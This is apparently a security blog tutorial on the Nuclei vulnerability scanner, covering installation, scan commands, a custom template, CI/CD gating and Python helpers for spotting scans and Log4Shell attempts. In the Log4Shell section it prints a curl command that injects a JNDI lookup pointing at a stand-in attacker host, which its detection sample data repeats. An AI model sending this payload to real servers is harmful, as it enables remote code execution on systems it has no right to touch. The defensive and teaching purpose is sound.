
Introduction:
Nuclei, developed by ProjectDiscovery, is a fast, customizable vulnerability scanner powered by YAML-based templates that enables security professionals to detect thousands of known and zero-day vulnerabilities across web applications, APIs, and cloud infrastructure. The recent Nuclei Nights event in Singapore, held alongside Black Hat Asia and DEF CON Singapore, underscored the growing importance of community-driven open-source security tools, bringing together experts who rely on Nuclei for everything from bug bounties to enterprise red teaming.
Learning Objectives:
- Install and configure Nuclei on both Linux and Windows environments for automated vulnerability scanning.
- Write and debug custom Nuclei templates to detect proprietary application flaws and zero-day vulnerabilities.
- Integrate Nuclei into CI/CD pipelines and cloud hardening workflows for continuous security validation.
You Should Know:
- Installing Nuclei on Linux and Windows – A Step‑by‑Step Guide
Nuclei is written in Go, making it cross‑platform. Below are verified commands for the two most common operating systems.
Linux (Ubuntu/Debian/Kali):
# Install Go (if not present)
sudo apt update && sudo apt install golang-go -y
# Download and install Nuclei
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
# Add Go binaries to PATH (add to ~/.bashrc or ~/.zshrc)
export PATH=$PATH:$(go env GOPATH)/bin
source ~/.bashrc
# Verify installation
nuclei -version
Windows (PowerShell as Administrator):
# Install Go from the official installer (https://go.dev/dl/) first, then:
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
# Add to PATH for the current session (replace with your user)
$env:Path += ";$env:USERPROFILE\go\bin"
# Make permanent:
# Test
nuclei -version
After installation, update the template database (required before first scan):
nuclei -update-templates
This downloads thousands of community and official templates into ~/nuclei-templates.
- Running Your First Nuclei Scan – Basic Command Structure
Nuclei scans targets using template directories. Here’s how to scan a single URL for critical and high‑severity issues.
Command:
nuclei -u https://example.com -severity critical,high -o results.txt
– `-u` : target URL (can also use `-list targets.txt` for multiple)
– `-severity` : filters templates by risk level
– `-o` : saves output to a file
Example with a live test target (OWASP Juice Shop):
nuclei -u http://juice-shop.herokuapp.com -tags tech,exposure -stats -si 5
– `-tags` : runs only templates tagged with “tech” (technology detection) or “exposure”
– `-stats` : shows live scan statistics
– `-si 5` : updates stats every 5 seconds
Windows equivalent – same command, just ensure `nuclei.exe` is in PATH.
To scan a list of subdomains from a file:
nuclei -list subdomains.txt -t ~/nuclei-templates/ -o subdomain_scan.txt
- Creating Custom Nuclei Templates – YAML Anatomy for Zero‑Day Detection
Nuclei’s power lies in its template system. Below is a template to detect a hardcoded API key in a JavaScript file.
Template file: `detect-api-key.yaml`
id: detect-exposed-api-key

info:
  name: Exposed Google Maps API Key in JS
  author: security_learner
  severity: medium
  description: Detects plaintext Google Maps API keys in JavaScript responses.
  tags: exposure,js,api

requests:
  - method: GET
    path:
      - "{{BaseURL}}/static/js/main.js"   # adjust path as needed

    matchers:
      - type: regex
        part: body
        regex:
          - 'AIza[0-9A-Za-z\-_]{35}'   # single-quoted: in a double-quoted YAML string "\-" is an invalid escape
        condition: or
Run it:
nuclei -u https://target.com -t detect-api-key.yaml
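The template above only fires when its regex matcher hits the response body. Before spending a scan on it, it helps to check the matcher logic offline. The following added example (written for this article, not code from ProjectDiscovery or the Nuclei project) models the matcher semantics the template relies on: `type` (regex, word, status), `part`, the per-matcher `condition` that joins a matcher's own patterns, `matchers-condition` that joins several matchers, and `negative`. It runs the article's regex against two constructed JavaScript responses; the key string is fabricated to fit the pattern and is not a real credential. `Response`, `STRICT_MATCHERS` and `demo` are names invented for the example.

```python
import re
from dataclasses import dataclass, field

# Constructed sample responses (not captured from any real site). The key is a
# fake string built only to match the template's pattern: "AIza" + 35 allowed chars.
FAKE_KEY = "AIza" + "SyExampleConstructedKey0123456789ab"
LEAKY_JS = "var cfg={maps:'" + FAKE_KEY + "'};init(cfg);"
CLEAN_JS = "var cfg={maps:window.__MAPS_KEY__};init(cfg);"

@dataclass
class Response:
    status: int
    body: str
    headers: dict = field(default_factory=dict)

# The matchers list from detect-api-key.yaml, expressed as Python dicts.
API_KEY_MATCHERS = [
    {"type": "regex", "part": "body",
     "regex": [r"AIza[0-9A-Za-z\-_]{35}"], "condition": "or"},
]

# A stricter variant for illustration: report only when the status is 200 AND
# the key is present (joined with matchers-condition: and).
STRICT_MATCHERS = [
    {"type": "status", "status": [200]},
    API_KEY_MATCHERS[0],
]

def _part_text(resp, part):
    """Select the response part a matcher inspects (body, header, or all)."""
    if part == "body":
        return resp.body
    header_text = "\n".join(f"{k}: {v}" for k, v in resp.headers.items())
    if part == "header":
        return header_text
    return header_text + "\n" + resp.body  # part: all

def eval_matcher(resp, m):
    """Evaluate one matcher; its own 'condition' joins its list of patterns/words."""
    join = all if m.get("condition", "or") == "and" else any
    kind = m["type"]
    if kind == "status":
        hit = resp.status in m["status"]
    elif kind == "word":
        text = _part_text(resp, m.get("part", "body"))
        hit = join(w in text for w in m["words"])
    elif kind == "regex":
        text = _part_text(resp, m.get("part", "body"))
        hit = join(re.search(r, text) is not None for r in m["regex"])
    else:
        raise ValueError(f"unsupported matcher type: {kind}")
    return not hit if m.get("negative", False) else hit  # negative: true inverts

def matches(resp, matchers, matchers_condition="or"):
    """matchers-condition joins the individual matcher results (Nuclei default: or)."""
    results = [eval_matcher(resp, m) for m in matchers]
    return all(results) if matchers_condition == "and" else any(results)

def extracted(resp, matchers):
    """Return the strings the regex matchers hit on, i.e. what a finding would show."""
    found = []
    for m in matchers:
        if m["type"] == "regex":
            text = _part_text(resp, m.get("part", "body"))
            for r in m["regex"]:
                found.extend(re.findall(r, text))
    return found

def demo():
    leaky, clean = Response(200, LEAKY_JS), Response(200, CLEAN_JS)
    return {
        "leaky_matches": matches(leaky, API_KEY_MATCHERS),
        "clean_matches": matches(clean, API_KEY_MATCHERS),
        "leaky_404_strict": matches(Response(404, LEAKY_JS), STRICT_MATCHERS, "and"),
        "keys_found": extracted(leaky, API_KEY_MATCHERS),
    }

if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The point of the `STRICT_MATCHERS` variant is the difference between `condition` (inside one matcher) and `matchers-condition` (across matchers): with the default `or`, a cached 404 page that happens to echo a key would still be reported, while `and` with a status matcher suppresses it.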
Step‑by‑step to build your own:
- Create a `.yaml` file under a custom folder (e.g., my-templates/).
- Define a unique `id` and an `info` block with metadata.
- Under `requests`, specify the HTTP method, path(s), and optional headers.
- Add `matchers` (regex, word, status, or DSL) to identify the vulnerability.
- Test locally:
nuclei -u http://test-target -t my-templates/
- Integrating Nuclei into CI/CD Pipelines & Cloud Hardening
Automate security scanning in GitHub Actions to catch vulnerabilities before merge.
GitHub Actions workflow `.github/workflows/nuclei-scan.yml`:
name: Nuclei Security Scan

on:
  push:
    branches: [ main ]
  schedule:
    - cron: '0 3 * * 1'   # weekly on Monday at 3 AM

jobs:
  nuclei:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout code
        uses: actions/checkout@v4

      - name: Setup Nuclei
        run: |
          go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
          ~/go/bin/nuclei -update-templates

      - name: Scan staging environment
        run: |
          ~/go/bin/nuclei -u https://staging.yourdomain.com -severity critical,high -o nuclei_report.txt

      - name: Upload report
        uses: actions/upload-artifact@v3
        with:
          name: nuclei-report
          path: nuclei_report.txt
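The workflow above uploads the report but never fails the build, so a critical finding on staging is only noticed when someone opens the artifact. The added example below (written for this article, not part of the Nuclei project) is a small gate script that reads Nuclei's JSON-lines report, drops duplicate findings and stray non-JSON lines, counts findings by severity and exits non-zero when anything at or above a chosen severity is present. The sample report is constructed; the field names `template-id`, `info.severity`, `host` and `matched-at` are assumed to mirror Nuclei's `-jsonl` output, and `SEVERITY_RANK`, `gate` and `parse_report` are names invented here.

```python
import json
import sys
from collections import Counter

# Constructed report lines in the shape of Nuclei's -jsonl output (field names
# template-id, info.severity, host, matched-at are assumed here); not real findings.
SAMPLE_REPORT = "\n".join([
    json.dumps({"template-id": "tech-detect",
                "info": {"name": "Technology Detection", "severity": "info"},
                "host": "https://staging.example", "matched-at": "https://staging.example/"}),
    json.dumps({"template-id": "detect-exposed-api-key",
                "info": {"name": "Exposed Google Maps API Key in JS", "severity": "medium"},
                "host": "https://staging.example", "matched-at": "https://staging.example/static/js/main.js"}),
    json.dumps({"template-id": "CVE-2021-44228",
                "info": {"name": "Apache Log4j RCE", "severity": "critical"},
                "host": "https://staging.example", "matched-at": "https://staging.example/api"}),
    # the same critical finding written twice (a rerun appended to the file)
    json.dumps({"template-id": "CVE-2021-44228",
                "info": {"name": "Apache Log4j RCE", "severity": "critical"},
                "host": "https://staging.example", "matched-at": "https://staging.example/api"}),
    "[WRN] stray log line that ended up in the report file",
])

SEVERITY_RANK = {"info": 0, "low": 1, "medium": 2, "high": 3, "critical": 4}

def parse_report(text):
    """Parse JSONL, skipping blank or non-JSON lines and exact duplicate findings."""
    seen, findings = set(), []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # tolerate stderr noise written into the report file
        key = (rec.get("template-id"), rec.get("matched-at"))
        if key in seen:
            continue
        seen.add(key)
        findings.append(rec)
    return findings

def severity_of(rec):
    return str(rec.get("info", {}).get("severity", "unknown")).lower()

def gate(text, fail_at="high"):
    """Return (exit_code, counts_by_severity, blocking_findings).
    exit_code is 1 when any finding is at or above fail_at."""
    findings = parse_report(text)
    counts = Counter(severity_of(f) for f in findings)
    threshold = SEVERITY_RANK[fail_at]
    blocking = [f for f in findings
                if SEVERITY_RANK.get(severity_of(f), -1) >= threshold]
    return (1 if blocking else 0), counts, blocking

if __name__ == "__main__":
    # usage: python3 nuclei_gate.py nuclei_report.jsonl [fail_at]
    path = sys.argv[1] if len(sys.argv) > 1 else None
    text = open(path, encoding="utf-8").read() if path else SAMPLE_REPORT
    code, counts, blocking = gate(text, sys.argv[2] if len(sys.argv) > 2 else "high")
    print("findings by severity:", dict(counts))
    for f in blocking:
        print(f"BLOCKING [{severity_of(f)}] {f.get('template-id')} at {f.get('matched-at')}")
    sys.exit(code)
```

To wire it in, have the scan step write `-jsonl -o nuclei_report.jsonl` in addition to the text report and add a step that runs `python3 nuclei_gate.py nuclei_report.jsonl high` before the upload step; the non-zero exit marks the job failed while the artifact is still kept for triage.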
Cloud hardening example – scan AWS S3 bucket permissions:
nuclei -target https://myapp.s3.amazonaws.com -tags s3,cloud -severity high
Add custom headers for AWS auth if needed:
nuclei -u https://bucket.s3.amazonaws.com -H "Authorization: Bearer $AWS_TOKEN"
- Advanced Nuclei Techniques: Fuzzing, Rate Limiting & Headless Browsing
To avoid overwhelming a target (or being blocked), use rate limiting and concurrency controls.
Rate‑limited scan:
nuclei -u https://target.com -t ~/nuclei-templates/ -c 25 -rl 100 -bs 512
– `-c 25` : concurrent threads (default 25)
– `-rl 100` : requests per second
– `-bs 512` : bulk size for host deduplication
Fuzzing with Nuclei + headless for JavaScript‑rendered apps:
nuclei -u https://singlepageapp.com -headless -tags xss,idor -timeout 10
The `-headless` flag launches a Chromium instance to execute client‑side JavaScript before matching.
Mitigation tip: If you are defending against Nuclei‑style scanning, implement:
– Rate limiting at the WAF (e.g., `iptables` rate limit or Cloudflare rules)
– Challenge‑based thresholds (CAPTCHA after 50 requests/minute)
– Dynamic token rotation for API endpoints
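The defensive thresholds just listed are easy to prototype against an access log before they are encoded in WAF rules. The following added example (written for this article, not part of any scanner or WAF product) buckets combined-format access log lines per client and minute, raises an alert when a client exceeds the 50 requests/minute figure from the tip above, and attaches the supporting signals an analyst would want: number of distinct paths, share of 4xx responses and whether the User-Agent names a scanner. The log lines are constructed; the `NUCLEI_UA` string is assumed to be the scanner's default User-Agent and, since any client can change it, is treated as a weak signal only.

```python
import re
from collections import defaultdict

# Assumed default User-Agent of the Nuclei CLI; clients can override it, so its
# presence is a low-effort signal, not proof of scanning.
NUCLEI_UA = "Nuclei - Open-source project (github.com/projectdiscovery/nuclei)"
BROWSER_UA = "Mozilla/5.0 (X11; Linux x86_64) Firefox/126.0"

def _line(ip, second, path, status, ua):
    return (f'{ip} - - [12/May/2025:10:00:{second:02d} +0000] '
            f'"GET {path} HTTP/1.1" {status} 153 "-" "{ua}"')

# Constructed combined-format access log (not from a real server): 10.0.0.5 probes
# 60 distinct paths within one minute, 10.0.0.9 browses normally.
SAMPLE_LOG = (
    [_line("10.0.0.5", s, f"/probe-{s}", 404, NUCLEI_UA) for s in range(60)]
    + [_line("10.0.0.9", s, "/index.html" if s % 2 else "/app.js", 200, BROWSER_UA)
       for s in range(0, 60, 12)]
)

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

def parse_line(line):
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["status"] = int(d["status"])
    d["minute"] = d["ts"][:17]  # "12/May/2025:10:00:05 +0000" -> "12/May/2025:10:00"
    return d

def analyze(lines, threshold=50):
    """Return one alert per (client, minute) with more than `threshold` requests,
    carrying the signals that separate a scanner burst from a busy user."""
    buckets = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            buckets[(rec["ip"], rec["minute"])].append(rec)
    alerts = []
    for (ip, minute), recs in sorted(buckets.items()):
        if len(recs) <= threshold:
            continue
        errors = sum(1 for r in recs if 400 <= r["status"] < 500)
        alerts.append({
            "ip": ip,
            "minute": minute,
            "requests": len(recs),
            "distinct_paths": len({r["path"] for r in recs}),
            "client_error_ratio": round(errors / len(recs), 2),
            "scanner_ua": any("nuclei" in r["ua"].lower() for r in recs),
        })
    return alerts

if __name__ == "__main__":
    for a in analyze(SAMPLE_LOG):
        print(a)
```

A high distinct-path count together with a high 4xx ratio is the profile of template-driven probing (hundreds of paths tried once each), which is what the challenge-based threshold should key on; a legitimate user hammering one endpoint looks different and can be handled with a plain rate limit instead.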
- Nuclei for API Security and Misconfigured Cloud Services
Nuclei includes a dedicated set of templates for API vulnerabilities (GraphQL, REST, gRPC). Run:
nuclei -u https://api.target.com/v1 -tags api,graphql -t ~/nuclei-templates/
Example – detect exposed Swagger/OpenAPI docs:
nuclei -u https://target.com -tags swagger,exposure -severity medium
Windows PowerShell automation for API scanning:
$targets = Get-Content .\api_endpoints.txt
foreach ($t in $targets) {
nuclei.exe -u $t -tags api -o "scan_$($t -replace '[^a-zA-Z]', '_').txt"
}
Cloud hardening action: Regularly scan your cloud load balancers and storage buckets:
# Scan all public buckets of an organization (requires valid AWS CLI config)
aws s3 ls | awk '{print $3}' | while read bucket; do
  nuclei -u "https://$bucket.s3.amazonaws.com" -tags s3,bucket -o "s3_$bucket.txt"
done
- Vulnerability Exploitation and Mitigation Based on Nuclei Findings
Once Nuclei reports a finding, you need to validate and remediate. Below is a real‑world example for Log4Shell (CVE-2021-44228).
Detect with Nuclei:
nuclei -u https://vulnerable-app.com -tags log4j -severity critical
Exploitation concept (for authorized testing only):
curl -X POST https://vulnerable-app.com/api -H 'X-API-Version: ${jndi:ldap://attacker.com/exploit}'
This forces the server to fetch a remote LDAP object, leading to RCE.
Mitigation steps for Linux servers:
# Remove vulnerable JndiLookup class from log4j-core (if version 2.10-2.14.1)
zip -q -d log4j-core-.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
# Or upgrade to log4j 2.17.0+
sudo apt update && sudo apt install log4j2=2.17.0
# Block outgoing LDAP/RMI in iptables
sudo iptables -A OUTPUT -p tcp --dport 389 -j DROP
sudo iptables -A OUTPUT -p tcp --dport 1099 -j DROP
Windows mitigation:
REM Remove JndiLookup class from log4j jar
jar -xf log4j-core-.jar
del org\apache\logging\log4j\core\lookup\JndiLookup.class
jar -uf log4j-core-.jar org/
REM Or set the system property via environment variable
set LOG4J_FORMAT_MSG_NO_LOOKUPS=true
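Two checks round off the Log4Shell remediation above from the defender's side: confirming whether requests carrying the `${jndi:` lookup string shown in the exploitation concept reached the application, and deciding which deployed log4j-core versions still fall short of the 2.17.0 upgrade target. The added example below (written for this article, not taken from the Nuclei project or any Log4j advisory) does both. It URL-decodes path and header values until they stop changing, since access logs usually store the payload percent-encoded, and compares parsed version tuples against 2.17.0. The requests are constructed, modelled on the header in the section above; `find_jndi`, `normalize` and `needs_remediation` are names invented here.

```python
import re
from urllib.parse import unquote

# Case-insensitive match for a JNDI lookup, the indicator shown in the exploitation
# concept above (${jndi:ldap://...}); the scheme after the colon is not restricted.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def normalize(value):
    """URL-decode until stable, so %24%7Bjndi... stored in a log is inspected as ${jndi..."""
    prev = None
    while prev != value:
        prev, value = value, unquote(value)
    return value

def find_jndi(request):
    """Return the request fields (path, header:<name>) that carry a JNDI lookup string."""
    hits = []
    if JNDI_RE.search(normalize(request.get("path", ""))):
        hits.append("path")
    for name, value in request.get("headers", {}).items():
        if JNDI_RE.search(normalize(value)):
            hits.append(f"header:{name}")
    return hits

def needs_remediation(version):
    """True when a log4j-core version string is below the 2.17.0 upgrade target above."""
    parts = tuple(int(p) for p in re.findall(r"\d+", version)[:3])
    return parts < (2, 17, 0)

# Constructed requests (not from a real server), modelled on the header in the
# exploitation concept above; the second one is the same string percent-encoded.
SAMPLE_REQUESTS = [
    {"path": "/api", "headers": {"X-API-Version": "${jndi:ldap://attacker.com/exploit}"}},
    {"path": "/search?q=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.com%2Fexploit%7D", "headers": {}},
    {"path": "/health", "headers": {"User-Agent": "curl/8.0"}},
]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(req["path"], "->", find_jndi(req) or "clean")
    for v in ("2.14.1", "2.17.0"):
        print(v, "needs remediation:", needs_remediation(v))
```

Any hit from `find_jndi` on a host that `needs_remediation` reports as outdated is the combination that should be treated as a suspected compromise rather than a blocked attempt, because the request reached the vulnerable lookup code before the iptables egress rules or the class removal took effect.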
What Undercode Say:
- Community‑driven templates are a double‑edged sword – they enable rapid detection of emerging threats but also give attackers insight into detection patterns, forcing defenders to constantly evolve custom rules.
- Integration beats isolation – Nuclei shines when embedded into CI/CD and cloud workflows, shifting security left and catching misconfigurations before production. The event in Singapore highlighted that real collaboration between DEF CON and Black Hat attendees accelerates tooling maturity.
- Automation without context is noise – Running default Nuclei scans generates hundreds of findings; success requires custom template writing, risk scoring, and remediation playbooks like the Log4Shell example above.
Prediction:
As open‑source “community nights” like Nuclei Nights proliferate globally, we will see a rapid convergence between offensive tooling and defensive automation. By 2027, most mid‑size enterprises will run scheduled, custom‑templated Nuclei scans as part of their standard patching cadence, while red teams will focus exclusively on chaining vulnerabilities that Nuclei cannot detect – pushing the industry toward more behavior‑based and AI‑driven detection. The lines between bug bounty, penetration testing, and continuous monitoring will blur entirely.